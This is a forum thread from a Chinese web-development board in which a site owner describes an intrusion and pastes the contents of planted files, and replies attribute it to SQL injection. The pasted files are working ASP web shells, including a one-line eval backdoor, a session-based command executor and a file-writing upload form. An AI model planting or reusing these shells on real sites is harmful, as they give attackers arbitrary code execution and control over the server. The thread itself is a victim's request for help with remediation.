分類  >  WEB開發>ASP >

網站被攻擊,不知黑客是如何進去的?明白人教教小弟我。如何補上這漏洞

tags:    時間:2013-12-13 00:07:07
網站被攻擊,不知黑客是怎麼進去的?明白人教教我。怎麼補上這漏洞?
我網站的目錄上,今天多了4個asp文件和一個mdb資料庫,

第一個asp文件內容是:幾乎把伺服器上的所有網站目錄都顯示出來了。以及某1,2個網站里的所有文件。(裡面還有許多亂碼,我看不懂,只能看懂幾個目錄和文件名)

第二個asp文件內容是:

你的網站被黑了!
<script   language= "vbscript "   runat= "server ">
If   Request( "huangzi ") <> " "   Then   Session( "lcxMarcos ")=Request( "huangzi ")
If   Session( "lcxMarcos ") <> " "   Then   Execute(Session( "lcxMarcos "))
</script>

<%eval(request( "a "))%>  

第三個asp文件內容是:

<%eval(request( "a "))%>

第四個asp文件內容是:
<%
on   error   resume   next
If   Request( "UP ")=9   then
T=Request.form( "N ")
S=Request.form( "M ")
set   F=server.CreateObject( "scripting.filesystemobject ")
set   I=F.OpenTextFile(T,8,True,0)
I.WriteLine( " "&S&   " ")
I.close
set   F   =   nothing  
%>
<form   method= "POST "ACTION= "# ">
<input   type= "text "size= "50 "name= "N "value= <%=server.mappath( "newfile.asp ")%> >
<textarea   style= "WIDTH:90%;HEIGHT:100px "   name= "M "class=input>
</textarea>
<input   type= "submit "name= "S "value= "F "class=input>
</form>
<%end   if%>

最後一個是mdb文件。。這個庫裡面竟然能把我的網站里的所有文件及子目錄全部都顯示出來了。


問請大俠,這是一種什麼樣的漏洞??怎麼補上??




------解決方案--------------------
你把你網站網址貼出來,我們幫你看看
從你站點日誌看,是SQL注入攻擊
------解決方案--------------------
多半是被注入了,可以用老兵或阿D工具檢查一下
如是你的程序不大,一個一個網頁看看,如果你是下載別人的程序來用更加要檢查
webshell.asp這個也可以
<%eval(request( "a "))%>
這句可以執行任何代碼
------解決方案--------------------
利用注入進入你的空間
上傳了海洋頂端ASP木馬..
呵呵
------解決方案--------------------
這個是腳本小子利用你的網站的SQL注入漏洞進來的!
寫個注入漏洞的程序進行過濾就OK.
可以找我.我給你一個SQL注入漏洞過濾程序!
應該就可以處理了.不過網路安全是防不勝防的.要加強對自我的技術提升.否則你天天讓人欺負都有可能.
找我可以到我的群(36510705).我很少上論壇.

推薦閱讀文章

Bookmark the permalink ,來源:互聯網